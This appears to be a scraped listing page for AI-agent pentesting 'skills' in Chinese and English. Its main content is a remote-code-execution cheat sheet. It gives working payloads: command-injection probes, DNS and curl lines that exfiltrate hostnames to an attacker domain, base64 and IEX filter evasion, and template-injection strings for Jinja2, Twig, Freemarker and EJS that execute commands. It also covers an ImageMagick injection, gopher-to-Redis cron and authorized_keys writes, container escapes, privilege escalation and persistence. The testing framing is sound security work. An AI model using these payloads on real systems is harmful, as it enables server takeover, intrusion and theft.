with one click
strix
Strix RCE 测试手册,覆盖命令注入、反序列化、模板注入与代码求值;触发名:strix-rce
Install with Codex or Claude Copy this prompt, paste it into Codex, Claude, or another assistant, and let it review the skill page and install it for you.
Menu
Strix RCE 测试手册,覆盖命令注入、反序列化、模板注入与代码求值;触发名:strix-rce
Install with Codex or Claude Copy this prompt, paste it into Codex, Claude, or another assistant, and let it review the skill page and install it for you.
Based on SOC occupation classification
面向中文用户和新手的统一入口,保持原有两种模式:1) 自动分流,2) 先头脑风暴再分流。分流目标既可以是 ctf-*,也可以在 Web/接口/漏洞验证阶段增强到 strix-*;适合不知道该用哪个 skill、想先理清题意、又不想自己先判断何时该切到工具链或漏洞专项的场景;触发名:ctf-beginner-hub
面向 CTF 新手与综合题的统一总控 skill。保持原有两种主模式:1) 自动分流,2) 先头脑风暴再分流。分流目标既可以是 ctf-*,也可以在 Web/接口/漏洞验证阶段增强到 strix-*;适合不知道该用哪个 skill、想边做边学、又不想自己先判断何时切换到工具链或漏洞专项的场景;触发名:ctf-super-hub
Strix JWT 与 OIDC 安全测试手册,覆盖令牌伪造、算法混淆与声明篡改;触发名:strix-authentication-jwt
给中文用户和新手用的 Strix Lite 统一入口:先判断该用哪一个 strix-* 工具或漏洞测试 skill,再给最小化起手步骤;适合在 Web 安全测试、工具链使用、漏洞验证时不知道先用哪个 Strix skill 的场景;触发名:strix-beginner-hub
Strix 功能级授权缺陷测试手册,覆盖操作级权限失效、管理功能越权与 API 操作绕过;触发名:strix-broken-function-level-authorization
Strix 业务逻辑漏洞测试手册,覆盖流程绕过、状态操控与领域约束破坏;触发名:strix-business-logic
| name | Strix•远程代码执行 |
| description | Strix RCE 测试手册,覆盖命令注入、反序列化、模板注入与代码求值;触发名:strix-rce |
Remote code execution leads to full server control when input reaches code execution primitives: OS command wrappers, dynamic evaluators, template engines, deserializers, media pipelines, and build/runtime tooling. Focus on quiet, portable oracles and chain to stable shells only when needed.
Command Execution
Dynamic Evaluation
Deserialization
Media Pipelines
SSRF Chains
Container Escalation
Unix
;sleep 1, `sleep 1`, || sleep 1Windows
& timeout /t 2 &, ping -n 2 127.0.0.1Start-Sleep -s 2DNS
nslookup $(whoami).x.attacker.tld
HTTP
curl https://attacker.tld/$(hostname)
Direct
;id;uname -a;whoami
Encoded
;(id;hostname)|base64
Delimiters and Operators
; | || & && cmd $(cmd) $() ${IFS} newline/tab& | || ^Argument Injection
--output=/tmp/x, --config=)$PATH, ${HOME}, command substitution%TEMP%, !VAR!, PowerShell $(...)Path and Builtin Confusion
/usr/bin/id) vs relying on PATHprintf, getent) when id is filteredsh -c or cmd /c wrappers to reach the shellEvasion
${IFS}, $'\t', <w'h'o'a'm'i, w"h"o"a"m"ia=i;b=d; $a$becho payload | base64 -d | shIEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(...)))Identify server-side template engines: Jinja2/Twig/Blade/Freemarker/Velocity/Thymeleaf/EJS/Handlebars/Pug
Minimal Probes
Jinja2: {{7*7}} → {{cycler.__init__.__globals__['os'].popen('id').read()}}
Twig: {{7*7}} → {{_self.env.registerUndefinedFilterCallback('system')}}{{_self.env.getFilter('id')}}
Freemarker: ${7*7} → <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id") }
EJS: <%= global.process.mainModule.require('child_process').execSync('id') %>
Java
.NET
PHP
unserialize() and PHAR metadataPython/Ruby
yaml.load/unsafe_load, MarshalExpression Languages
ImageMagick/GraphicsMagick
push graphic-context
fill 'url(https://x.tld/a"|id>/tmp/o")'
pop graphic-context
Ghostscript
%pipe%id file operatorsExifTool
LaTeX
\write18/--shell-escape, \input piping; pandoc filtersffmpeg
FastCGI
gopher:// to php-fpm (build FPM records to invoke system/exec)Redis
gopher:// write cron/authorized_keys or webrootAdmin Interfaces
Docker
/.dockerenv, /proc/1/cgroupcapsh --print/proc/sys/kernel/core_pattern or mount host with --privilegedKubernetes
/var/run/secrets/kubernetes.io/serviceaccountEncoding Differentials
Binary Alternatives
Privilege Escalation
sudo -l; SUID binaries; capabilities (getcap -r / 2>/dev/null)Persistence
Lateral Movement
RCE is a property of the execution boundary. Find the sink, establish a quiet oracle, and escalate to durable control only as far as necessary. Validate across transports and environments; defenses often differ per code path.